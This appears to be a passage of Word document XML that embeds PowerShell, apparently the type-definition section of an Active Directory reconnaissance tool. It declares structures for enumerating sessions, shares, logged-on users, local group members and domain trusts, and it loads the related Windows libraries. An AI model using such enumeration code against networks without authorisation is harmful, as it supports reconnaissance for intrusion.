    <w:p w14:paraId="0E2218D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ExecEnvId = field 0 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1F9019" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    State = field 1 $WTSConnectState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE7FE6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    SessionId = field 2 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518724A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    pSessionName = field 3 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E560CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    pHostName = field 4 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF1267" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    pUserName = field 5 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31DE45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    pDomainName = field 6 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028E9A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    pFarmName = field 7 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C97F3B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6CD991" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06E36AB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the particular WTSQuerySessionInformation result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D81BC8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B77C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    AddressFamily = field 0 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E6E6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Address = field 1 Byte[] -MarshalAs @('ByValArray', 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF055D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DC2CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50A6788D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the NetShareEnum result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BA9C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$SHARE_INFO_1 = struct $Mod SHARE_INFO_1 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CA2C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    shi1_netname = field 0 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCF585" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    shi1_type = field 1 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C3D19F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    shi1_remark = field 2 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DA697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCC2ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0CCED04C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the NetWkstaUserEnum result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519B10C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$WKSTA_USER_INFO_1 = struct $Mod WKSTA_USER_INFO_1 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA1776" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    wkui1_username = field 0 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952FEAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    wkui1_logon_domain = field 1 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200139F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    wkui1_oth_domains = field 2 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18BF7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    wkui1_logon_server = field 3 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52774905" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45393582" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EC69D42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># the NetSessionEnum result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BCF6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1A2B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    sesi10_cname = field 0 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC8565" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    sesi10_username = field 1 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C66D01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    sesi10_time = field 2 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485075D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    sesi10_idle_time = field 3 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C56E9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30FE50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5898F9E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># enum used by $LOCALGROUP_MEMBERS_INFO_2 below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB837FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59489E4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeUser             = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDF592" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeGroup            = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2B6B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeDomain           = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A582155" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeAlias            = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5203A314" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeWellKnownGroup   = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70941100" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeDeletedAccount   = 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D2BED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeInvalid          = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B17E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeUnknown          = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67812660" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    SidTypeComputer         = 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA1DD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946DF2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EEC8BAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the NetLocalGroupGetMembers result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B74CE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D3631" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    lgrmi2_sid = field 0 IntPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4E991" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    lgrmi2_sidusage = field 1 $SID_NAME_USE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E12B81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EC6CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592DCFF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D8FE543" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># enums used in DS_DOMAIN_TRUSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B0D77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542044B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    IN_FOREST       = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F88940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DIRECT_OUTBOUND = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6509C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    TREE_ROOT       = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F7452" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    PRIMARY         = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E4D2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    NATIVE_MODE     = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC37397" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DIRECT_INBOUND  = 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24364332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>} -Bitfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC98C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CD171" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DOWNLEVEL   = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BD822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    UPLEVEL     = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF6266" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    MIT         = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCEB8EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DCE         = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619915B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E30178" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC3953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    NON_TRANSITIVE      = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0121A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    UPLEVEL_ONLY        = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F326F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    FILTER_SIDS         = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AC26C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    FOREST_TRANSITIVE   = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38718A44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    CROSS_ORGANIZATION  = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D23528" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    WITHIN_FOREST       = 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E334B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    TREAT_AS_EXTERNAL   = 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812B683" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F09995" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7940A25F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># the DsEnumerateDomainTrusts result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA20E06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700CB3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    NetbiosDomainName = field 0 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481621D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DnsDomainName = field 1 String -MarshalAs @('LPWStr')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DB78B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Flags = field 2 $DsDomainFlag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27973480" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ParentIndex = field 3 UInt32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5E6A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    TrustType = field 4 $DsDomainTrustType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E211B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    TrustAttributes = field 5 $DsDomainTrustAttributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8E8A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DomainSid = field 6 IntPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1C1A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    DomainGuid = field 7 Guid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E2676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06866911" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D796FBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C09933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$Netapi32 = $Types['netapi32']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C216F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$Advapi32 = $Types['advapi32']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755A8996" w14:textId="01F7C89E" w:rsidR="00AD26F8" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>$Wtsapi32 = $Types['wtsapi32']</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AD2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47"/>
    <w:rsid w:val="002C4447"/>
    <w:rsid w:val="00AD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6CA8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7156A508-190C-4DAE-BA0B-71097B4F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479</Pages>
  <Words>66893</Words>
  <Characters>381294</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3177</Lines>
  <Paragraphs>894</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>447293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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-17T13:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-17T13:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>